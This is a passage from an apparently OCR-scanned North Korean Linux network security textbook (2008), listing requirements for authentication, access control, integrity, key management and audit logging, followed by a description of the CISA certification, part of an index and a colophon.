④ 실패한 사건의 경우 실패리유 

(3) 사건기 록 및 추적기 능은 사건기 록를 저 장할 기 억 장소가 없거 나 기 억 용량이 부족 
할 가능성 이 있을 경우 다양한 방법으로 관리자에게 알릴수 있는 수단을 제공하여야 한다. 

(4> 생성된 사건기 록파일은 외부적 인 보조기 억 장치에 도 저 장할수 있어 야 한다. 
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(5) 사건기 록파일은 관리 자가 알아 볼수 있 어 야 하며 관리 자가 리해할수 있는 형 태 
로 제공되여 야 한다. 

(6) 사건기 록 및 추적기 능은 사건기 록를 저 장할 기 억 장소가 없거 나 용량이 부족할 경 
우 관리 자의 활동만을 허 용하여 야 하며 관리 자에 의한 기 억 장소복구조치후 사건기 록를 생 
성 및 기록할수 있어 야 한다. 

(7) 사건기록 및 추적기능은 속성별로 사건기록을 검색 및 통계자료를 제공할수 있 
어 야 한다. 

(8) 사건기 록 및 추적기 능은 다음의 사건 발생 시 다양한 방법 으로 관리 자에 게 알릴수 
있는 수단을 제공하여 야 한다. 

① 신분확인기능위반 

② 임의의 접근통제규칙 및 강제적접근통제규칙 위반 

③ 자료의 완전성 및 전송자료의 완전성위 반 

④ 보안기술체계관리 프로쎄스의 정지 

(9) 사건기 록 및 추적기 능은 접 속상태 를 실시 간으로 제 공할수 있 어 야 한다. 

6) 보안기술체계관리 

(1) 보안기 술체 계 관리 기 능은 관리 자가 다음의 기 능을 수행할수 있도륵 하여 야 한다. 

① 모든 접근 및 보안기술체계를 통한 접속에 대하여 주체와 객체간에 적용되 
는 임의의 접근통제규칙의 설정，조회，변경 및 삭제 

② 관리자신분확인관련 자료의 설정，조회 및 변경 

③ 사건기록대상의 설정，조회，변경，추가 및 삭제 

④ 사건기록파일의 조회，삭제 및 초기화 

⑤ 보조기억장치에 사건기록파일생성 

⑥ 사용자 신분확인관련자료의 설정，조회，변경，및 삭제 

⑦ 사건기록에 대한 속성별 검색기능의 설정 및 취소 

⑧ 모든 접근 및 보안기술체계를 통한 접속에 대하여 주체와 객체간에 적용되 
는 강제적접근통제 규칙의 설정，조회，변경 및 삭제 

⑨ 보안준위 정보의 설정，조회，변경 및 삭제 

(2) 보안기 술체 계관리 기 능은 보안기 술체 계 가 제 공하는 일 반적 인 응용봉사를 특성별 
로 안전하게 운영될수 있는 수단을 제공하여야 한다. 

(3) 보안기 술체 계관리 기 능은 반영 구적 인 외 부보조기 억 장치 에 보안체 계 를 구성하는 중 
요내용을 적재하고 복구하는 수단을 제공하여야 한다. 
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5.2.6. 콤퓨터망 6급보안기준 

6급은 를퓨터망보안에서 보안령역을 명백히 지정하고 보안요소들의 호상관계를 정 
확히 밝혀 변경 을 방지하며 검 증된 설계 를 통하여 보안을 실시한다. 

1) 신분확인 

① 신분확인기능은 보안기술체계에 접근하는 관리자를 식별 및 인증하여야 한다. 

② 신분확인기능은 원격지에서 보안기술체계에 접근하는 관리자를 식별 및 호상인증 
하여 야 한다. 

③ 신분확인기능은 보안기술체계에 접근하는 사용자를 식별 및 호상인증하여야 한다. 

④ 신분확인기능은 인증수단의 최소길이，조합규칙，변경주기를 제공하여야 한다. 

⑤ 신분확인기 능은 사용자 및 관리 자를 인증하기 위하여 사용된 정 보를 재 사용하는 공 
격 에 대 처할수 있는 수단을 제 공하여 야 한다. 

⑥ 신분확인기능은 응용봉사접속후 일정시간동안 응답하지 않는 상태일 경우 재인증 
하여 야 한다. 

2) 접근통제 

(1) 임의의접근통제기능은 보안기술체계에 접근 또는 보안기술체계를 통하여 이루어 
지는 모든 접속에 대하여 보안속성에 기초한 임의의 접근통제규칙을 적용하여 접근을 통 
제 하여 야 한다. 

(2) 강제 적 접 근통제기 능은 보안기 술체 계 에 접 근 또는 보안체 계 를 통하여 이 루어 지 
는 모든 접 속에 대 하여 보안준위 에 기 초한 강제 적 인 접 근통제 규칙 을 적 용하여 접 근을 통 
제 하여 야 한다. 

3) 완전성 

(1) 자료완전성 기 능은 보안기 술체 계 가 관리하는 다음의 자료가 허 용되 지 않은 방법 
으로 변경되였는지를 확인할수 있어야 한다. 

① 관리자 및 사용자의 신분확인관련자료 

② 임의의 접근통제규칙 

③ 강제 적 인 접 근통제 규칙 

④ 보안준위 

⑤ 보안기 술체 계 를 구성하는 실 행파일 

(2) 전송자료완전성기 능은 보안기 술체 계 를 통해 전송되 는 자료에 변경 이 발생할 경 
우 이를 확인할수 있어야 한다. 

4) 기밀성(선택사항) 

전송자료 기 밀성기 능은 보안기 술체 계 를 통하여 전송되 는 자료가 허 용되 지 않은 사용 
자에게ᄉ로출되 였을 경우 그 내 용이 알려지는것을 방지 하기 위하여 자료를 암호화할수 있 
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어 야 한다. 

(1) 암호열쇠관리 

① 암호열쇠는 암호와 관련된 목적으로만 사용되여 야 하며 주기적으로 변경될수 있 
어 야 한다. 

② 암호열쇠관리기능은 암호열쇠의 임의성을 보장할수 있는 열쇠생성수단을 제공 
할수 있어 야 한다. 

③ 암호열쇠관리기능은 외부로부터의 허용되지 않은 공격에 대처할수 있는 안전한 
열쇠분배수단을 제공할수 있어 야 한다. 

④ 암호열쇠관리기능은 저장된 열쇠에 대하여 허용되지 않은 공격에 대처할수 있 
는 안전한 열쇠저장수단을 제공할수 있어야 한다. 

⑤ 암호열쇠관리기능은 유효하지 않은 열쇠를 안전하게 파기할수 있는 수단을 제공 

할수 있어 야 한다. 

⑥ 암호열쇠관리기능은 허용된 관리자에게 열쇠속성을 설정 및 변경할수 있는 기 
능을 제공할수 있어 야 한다. 

⑦ 암호열쇠관리기능은 열쇠관리와 관련된 사건에 대하여 사건기록를 생성할수 있 
어 야 한다. 

(2) 암호연산 

① 암호연산은 안전성 이 검증된 암호알고리듬과 암호열쇠의 크기에 따라 수행 
될수 있어야 한다. 

② 암호연산과 관련된 사건에 대하여 사건기록를 생성할수 있어야 한다. 

5) 사건기록 및 추적 

(1) 사건기 록 및 추적 기 능은 다음의 사건에 대 하여 사건기 록를 생 성하여 야 한다. 

① 보안기술체계의 시동 및 완료 

② 사건기록의 시작 및 완료 

③ 관리자신분확인관련 자료의 설정 및 변경 

④ 관리자에 대한 식별 및 인증 

⑤ 원격으로 접근하는 관리자에 대한 식별 및 호상인증 

⑥ 임의의접근통제 규칙의 설정，변경 및 삭제 

⑦ 통신 및 통신규약의 시 작 및 완료 

⑧ 사용자의 신분확인 관련자료의 설정，변경，및 삭제 

⑨ 사용자에 대한 식별 및 호상인증 

⑩ 자료의 완전성위반 

⑪ 전송자료의 완전성을 위반한 통신 및 통신규약 
⑫ 강제적인 접근통제규칙의 설정，변경 및 삭제 
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⑬ 보안준위 정보의 설정，변경 및 삭제 

⑭ 보안기술체계관리프로쎄스의 정지 

⑮ 장치의 고장 

⑯ 침입류형의 설정 및 변경 

(2) 사건기 록에 는 다음의 정 보가 기 록되 여있 어 야 한다. 

① 주체 및 객체의 식별자 

② 날자와 시간 

③ 사건의 형태 및 중요도 

④ 사건의 성공 또는 실패 여부 

⑤ 실패한 사건의 경우 실패리유 

(3) 사건기록 및 추적기능은 사건기록를 저장할 기 억장소가 없거 나 용량이 부족할 가 
능성이 있을 경우 다양한 방법으로 관리자에게 알릴수 있는 수단을 제공하여야 한다. 

(4) 생성된 사건기 록파일은 외부적 인 보조기 억 장치에 도 저 장할수 있어 야 한다. 

(5) 사건기록파일은 관리자가 알아볼수 있어야 하며 관리자가 리해할수 있는 형태로 
제공되 여 야 한다. 

(6) 사건기 록 및 추적기 능은 사건기 록를 저 장할 기 억 장소가 없거 나 용량이 부족할 경 
우 관리 자 활동만을 허 용하여 야 하며 관리 자에 의한 기 억 장소 복구조치 후 사건기 록를 생 
성 및 기록할수 있어 야 한다. 

(7) 사건기록 및 추적기능은 속성별로 사건기록를 검색 및 통계자료를 제공할수 있 
어 야 한다. 

(8) 사건기록 및 추적기능은 다음의사건 발생시 다양한 방법으로 관리자에게 알릴수 
있는 수단을 제공하여 야 한다. 

① 신분확인기능위반 

② 임의의접근통제 규칙 및 강제적인 접근통제규칙위반 

③ 자료의 완전성 및 전송자료의 완전성위 반 

④ 보안기술체계관리프로쎄스의 정지 

⑤ 장치의 고장 

(9) 사건기 록 및 추적기 능은 접 속상태 를 실시 간으로 제 공할수 있 어 야 한다. 

(10) 사건기록 및 추적 기능은 관리자가 설정한 침입류형을 검출할수 있어야 하며 이 
러한 침입류형 이 검출될 경우 즉시 관리자에게 알릴수 있는 수단을 제공하여야 한다. 


6) 보안관리 

(1) 보안기 술체 계 관리 기 능은 관리 자가 다음의 기 능을 수행할수 있도륵 하여 야 한다. 
① 모든 접속 및 자료파케트에 대 하여 주체와 객체간에 적 용되는 임의의 접 근통 
제규칙의 설정，조회，변경 및 삭제 
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② 관리자신분확인관련 자료의 설정，조회 및 변경 

③ 사건기록대상의 설정，조회，변경，추가 및 삭제 

④ 사건기록파일의 조회，삭제 및 초기화 

⑤ 보조기 억장치 에 사건기록파일생성 

⑥ 사용자 신분확인관련 자료의 설정，조회，변경 및 삭제 

⑦ 사건기록에 대한 속성별 검색기능의 설정 및 취소 

⑧ 모든 접근 및 보안체계를 통한 접속에 대하여 주체와 객체간에 적용되는 강 
제적인 접근통제규칙의 설정，조회，변경 및 삭제 

⑨ 보안준위 정보의 설정，조회，변경 및 삭제 

⑩ 침입류형의 설정，조회，변경，및 삭제 

(2) 보안기 술체 계 관리 기 능은 보안기 술체 계 가 제 공하는 일 반적 인 응용봉사특성 별 로 안 
전하게 운영될수 있는 수단을 제공하여 야 한다. 

(3) 보안기 술체 계관리 기 능은 반영 구적 인 외 부 보조기 억 장치 에 보안기 술체 계 를 구성 
하는 중요내용을 적재하고 복구하는 수단을 제공하여 야 한다. 

(4) 보안관리 기 능은 다음의 사항에 대 처 할수 있는 믿음성 있는 수단을 제 공하여 야 한다. 

① 보안기술체계관리프로쎄스의 정지 

② 장치의 고장 


제3절. 보안자격제도 

1950년대 후반기부터 세계적 으로 콤퓨터를 리용한 정 보처 리 가 가속화되 였다. 이 려 한 
조건에서 초기정보체계검열은〈〈내부통제를 위한 표준규정조직의 확립 및 유효성을 조사》 
하는 형태로 시작되였다. 1960년대 후반기에는 정보체계검열과 관련된 연구가 활발해지 
고 금융기관에서 시작된 내부검열제도가 일반화되였으며 보안에 대한 인식 이 높아지기 시 
작하였다. 1970년대에 들어와 정보화의 역기능이 콤퓨터범죄로 이어졌으며 정보체계검열 
의 필요성 을 인식하게 되 였 다. 

이러한 환경에서 1969년 I SAC A (Information Systems Audit and control Associati 
on ： 정보체계검열통제협회 ) 인 EDPAA 가 창설되였다. ISACA 에서는 1981년부터 
CISA(Certified Infoamtion Systems Auditor : 국제적 인 정 보체 계 검 열자)라는 시험제도 
를 실시해 오고있으며 전 세계 적 으로 10 000여명 이 활발히 활동하고있다. 
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CISA 자격 조건 

CISA 프로그람은 뛰여난 기술과 판단력을 증명하는 정보체계 검열，통제，보안 직종 
에 종사하는 개 인을 평 가하고 증명 하기 위하여 설계 되 였 다. CISA 의 전문기 술은 정 보기 술 
이 급변하는속에서 대 단히 가치있고 효과적 인 정보체계 검열，통제 및 보안실무를 적용할 
수 있으며 특수한 요구들을 인식하고있는 공인된 전문가를 고용할 필요가 있을 때 대단히 
유용하다. CISA 자격 을 받기 위 해서는 CISA 시 험 에 합격한 후에 5개 령 역 에 관련된 정 보 
체계검열，통제 및 보호분야에서 최소한 5년의 경력이 있어야 한다. 이것은 다음의 경력 
으로 대 치할수 있 다. 

— 1년이상의 정보체계운영，프로그람작성능력 또는 회계검열경력은 정보체계검열통 
제 보안경력 1년으로 인정 

一 전문대학 또는 대 학졸업학력은 각각 1년 또는 2년의 정보체계의 검열 및 보안경 
력으로 인정 

一 관련분야(콤퓨터과학，회계，정보처리 검열 등)에서의 대학전임강사이상의 경력은 
매 2년당 정보체계의 검열통제 및 보안경력 1년으로 인정 

CISA 자격(증)신청 은 시 험합격 후 5년이내 에 해 야 하며 경 력은 자격신청일기준으로부 
터 과거 10년이내 또는 최초시험의 합격일로부터 5년이내의 경력이여야 한다. 만약 시험 
합격날자로부터 5년내 에 CISA 신청을 하지 않으면 시험을 다시 쳐서 합격되 여 야 하며 모 
든 경력은 개별적으로 확인받아야 한다. 비록 모든 요구조건이 만족될 때까지 CISA 자격 
은 받지 못하지만 CISA 시험응시자체 에는 자격제 한이 없으므로 요구조건이 충족되지 않았 
어 도 CISA 시 험 은 응시할수 있 다. 

공인후의 자격 을 유지 하기 위 해 서 는 계 속 재 교육을 받아야 한다. 매 해 최 소 20시 간， 
3년간 최소 120시간이상의 지속교육 ( CPE ) 이 필요하다. 교육프로그람은 정보체계 검열，관 
리，회계 및 금융，보험 등 특별한 산업분야의 직업적인 령역에 대한 기존지식과 기술을 갱 
신하도록 요구함으로써 개 인의 능력 을 관리한다. 

CISA 시 험 은 별도의 과목이 정 해 져 있지 않고 하나의 프로쎄 스령역 과 6개 의 내 용령 역 
으로 구성되여있다. 
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프로쎄 스 

령역 

IS 검 열 
프로쎄 스 

10% 

정보기술과 사업체계가 적절하게 통제，감시 및 평가되 
는것 을 보증하기 위하여 일 반적 으로 받아들이 는 IS 검 열 
기준 및 지침에 따라 IS 검열을 수행 

내용 

령역 

IS 의 관리， 
계획 및 
조직 

11% 

IS 의 관리，계획 및 조직을 위한 전략，방책，표준，절 
차 및 관련된 실무를 평가 

기술능력과 
운영 실무 

13% 

기관의 사업목적 이 적절하게 지원되는가를 보증하기 위 
하여 기관의 기술 및 운영능력 관리의 효과성과 효률성 
을 평가 

정보자원의 

보호 

25% 

정보자원을 인증되지 않은 사용，로출，변경，피해 및 손 
실 로부터 보호하기 위한 기 관의 사업 요구사항을 충족함 
을 보증하기 위 하여 론리 적，환경 적 및 IT 보안능력 을 평 
가 

재해복구 및 
사업 련속성 

10% 

재 해 발생 시 사업 운영 및 IS 프로쎄 스의 지 속을 위한 계 
획의 개발과 유지프로쎄스를 평가，이러한 계획은 문서 
화되고 론의되 고 시험되여 야 한다. 

사업응용체계 
개발，취득， 
구현 및 유지 

16% 

사업응용체 계 개 발，취 득，구현 및 유지 가 기 관의 사업 
목표를 충족함을 보장하기 위 하여 이 에 사용된 방법 론 및 
프로쎄스의 평가 

사업프로쎄스 
평가와 
위험관리 

15% 

조직의 사업목표에 상응하여 위험에 대한 관리를 보장 
하기 위하여 사업체 계와 프로쎄스를 평 가 


시험의 형식은 교육 및 학습을 통하여 배울수 있는 지식과 기술에 관한 지식항목，정 
보체계검열원으로서의 실무경험을 통하여 배울수 있는 지식과 기술에 관한 실무관련항목， 
지시사항과 실무관련사항의 결합형태의 응용으로 얻을수 있는 지식과 기술인 포괄적인 개 
념으로 나눌수 있다. 그러나 CISA 시험은 전세계적으로 수행되기때문에 매 개 인의 인식 이 
나 경험이 세계적인 위치나 환경에 일치하지 않을수도 있다. 

CISA 시 험 응시 자격 은 제 한없 이 누구나 시 험 에 응시 할수 있 다. 그러 나 시 험 에 합격 한 후 
5년이내 에 ISACA 가 요구하는 정 보체계 검 열분야경험 을 증명할수 있어 야 자격증이 주어 진 
다. 시 험은 매 해 1회 실시하는데 보통 4월 1일까지 응시신청 을 받고 6월 두번째 주 토요 
일에 시험을 친다. 시험은 전 세계도시에서 동시에 실시되며 시험장소는 해당 자국내 ISACA 
기 관에 서 매 해 선정 한다. CISA 문제 류형 은 객 관적 으로 200문제 가 선줄되 며 시 험 시 간은 4 
시간이다. 

응시신청서 에 기 입하여 신용카드로 결제하게 된다. 합격점수는 비 례점수방식 
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하여 75점이상(최하점을 0점，최고점을 99점으로 계산하여 75%이상)되여야 한다. 시험 
언어는 조선어，영어，일어，도이월란드어，프랑스어，에스빠냐어，헤브라이어，네데를란 
드어，이딸리 아어，중어중에서 선택할수 있다. 시 험응시신청 은 ISACA 홈폐지 에서 직결로 
할수 있다. 



■ 
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정보보안침해 . 51 

정보수집 . 61 

정 적 파케 트러 과 . 195 

중복체계 . 24 

중앙관리 봉사기 . 13 

중앙관리 체계 . 18 

집 선기 . 41 

침입 . 242 

침입검출봉사기 . 12 

콤퓨터 비 루스 . 116 

트로이목마 . 306 

파케트엿듣기 . 75 

표현층 . 36 


해커 . 51 

해킹 . 51 

BSD 소케 트층 . 126 

CA 봉사기 . 12 

ESP . 276 

IDS . 243 

INET 소케 트층 . 133 

ipchains . 212 

iptables . 224 

IP 쪼각화 . 99 

libpcap . 336 

OSI 모형 .32 

TCP/IP .38 

VPN .262 

VPN 체 계 .20 
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Linux 망보안 


집필 김혁 
편 집 림일남 
장 정 서경애 


심 사 김윤기 
교 정 박석재 

콤퓨터편성 여은정 


낸 곳 교육성 교육정보쎈터 인쇄소 교육성 교육정보쎈터 

인 쇄 주체 97 (2008) 년 8 월 10 일 발 행 주체 97 (2008) 년 8 월 20 일 
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